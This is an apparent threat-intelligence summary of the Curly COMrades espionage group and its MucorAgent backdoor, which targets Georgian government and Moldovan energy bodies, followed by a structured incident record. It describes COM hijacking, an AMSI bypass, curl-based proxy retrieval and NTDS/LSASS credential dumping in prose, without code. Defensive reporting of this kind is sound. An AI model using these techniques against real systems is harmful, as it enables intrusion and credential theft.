New Russian-Linked Cyber-Espionage Group "Curly COMrades" Targets Government and Energy Sectors
A newly identified cyber-espionage threat group, tracked as Curly COMrades, has been conducting operations aligned with Russian geopolitical interests since mid-2024. The group has targeted government and judicial bodies in Georgia and energy firms in Moldova, deploying a sophisticated custom backdoor malware called MucorAgent.
Attack Chain and Tactics
Curly COMrades employs a three-stage .NET-based malware designed for stealth and persistence. The attack begins with an undetermined initial access vector, followed by the deployment of proxy agents like the Go-based Resocks, which is retrieved via curl.exe and registered as scheduled tasks or Windows services for persistence. Communication with the command-and-control (C2) server occurs over TCP ports 443 or 8443.
For redundancy, the group uses custom SOCKS5 servers, SSH with Stunnel for remote port forwarding, and a tool called CurlCat, which obfuscates traffic by relaying it through compromised legitimate websites using libcurl and a custom Base64 alphabet.
Unconventional Persistence Mechanisms
Bitdefender researchers observed an unpredictable persistence method involving the hijacking of Component Object Model (COM) objects to target NGEN (Native Image Generator), a Windows .NET Framework component. The malware leverages a disabled scheduled task that executes at random intervals, such as during system idle times or application deployments. The group also deployed legitimate remote monitoring tools, including Remote Utilities (RuRat) and RMM software, to maintain interactive control over compromised systems.
MucorAgent Backdoor Capabilities
The MucorAgent backdoor consists of three components:
- COM hijacking to load a second .NET stage.
- AMSI bypass to evade Windows’ Antimalware Scan Interface.
- Encrypted payload execution, where the malware searches for index.png and icon.png files actually encrypted data blobs downloaded from compromised websites.
The threat actor conducted credential theft, including attempts to dump the NTDS database from domain controllers and extract LSASS memory for active credentials. They also used living-off-the-land (LOLBin) commands (e.g., netstat, tasklist, systeminfo, wmic, ipconfig) and PowerShell Active Directory enumeration to move laterally and exfiltrate data.
Detection and Attribution
Despite efforts to blend malicious activity with legitimate traffic, Curly COMrades’ operations generated enough detectable noise to be flagged by modern EDR/XDR solutions. While no direct links to known Russian APT groups have been confirmed, the targeting of Georgian and Moldovan entities aligns with Russian strategic interests. The group’s heavy reliance on curl.exe for exfiltration and COM hijacking led researchers to name them Curly COMrades.
Government of Georgia cybersecurity rating report: https://www.rankiteo.com/company/government-of-georgia
"id": "GOV1775759952",
"linkid": "government-of-georgia",
"type": "Cyber Attack",
"date": "8/2025",
"severity": "100",
"impact": "6",
"explanation": "Attack threatening the economy of geographical region"{'affected_entities': [{'industry': 'Government',
'location': 'Georgia',
'type': 'Government/Judicial Bodies'},
{'industry': 'Energy',
'location': 'Moldova',
'type': 'Energy Firms'}],
'attack_vector': 'Undetermined initial access vector, COM hijacking, '
'scheduled tasks, Windows services',
'data_breach': {'data_encryption': 'Yes (payloads encrypted as PNG files)',
'data_exfiltration': 'Yes (via curl.exe, CurlCat, and '
'encrypted payloads)',
'file_types_exposed': ['PNG (encrypted data blobs)',
'Active Directory data'],
'personally_identifiable_information': 'Likely (credentials, '
'NTDS database)',
'sensitivity_of_data': 'High (NTDS database, LSASS memory, '
'Active Directory enumeration)',
'type_of_data_compromised': ['Credentials',
'Sensitive government/energy '
'sector data']},
'date_detected': '2024',
'description': 'A newly identified cyber-espionage threat group, tracked as '
'Curly COMrades, has been conducting operations aligned with '
'Russian geopolitical interests since mid-2024. The group has '
'targeted government and judicial bodies in Georgia and energy '
'firms in Moldova, deploying a sophisticated custom backdoor '
'malware called MucorAgent.',
'impact': {'data_compromised': 'Credentials (NTDS database, LSASS memory), '
'sensitive government and energy sector data',
'identity_theft_risk': 'High (personally identifiable information '
'and credentials compromised)',
'operational_impact': 'Lateral movement, data exfiltration, '
'potential disruption of critical services',
'systems_affected': 'Government/judicial bodies (Georgia), energy '
'firms (Moldova)'},
'initial_access_broker': {'backdoors_established': 'Yes (Resocks, RuRat, RMM '
'software)',
'high_value_targets': 'Government/judicial bodies '
'(Georgia), energy firms '
'(Moldova)'},
'investigation_status': 'Ongoing',
'motivation': 'Geopolitical interests (aligned with Russian strategic '
'objectives)',
'post_incident_analysis': {'root_causes': 'COM hijacking, scheduled tasks, '
'use of legitimate remote '
'monitoring tools, undetermined '
'initial access vector'},
'references': [{'source': 'Bitdefender'}],
'response': {'enhanced_monitoring': 'EDR/XDR solutions',
'third_party_assistance': 'Bitdefender researchers'},
'threat_actor': 'Curly COMrades',
'title': "New Russian-Linked Cyber-Espionage Group 'Curly COMrades' Targets "
'Government and Energy Sectors',
'type': 'Cyber-Espionage'}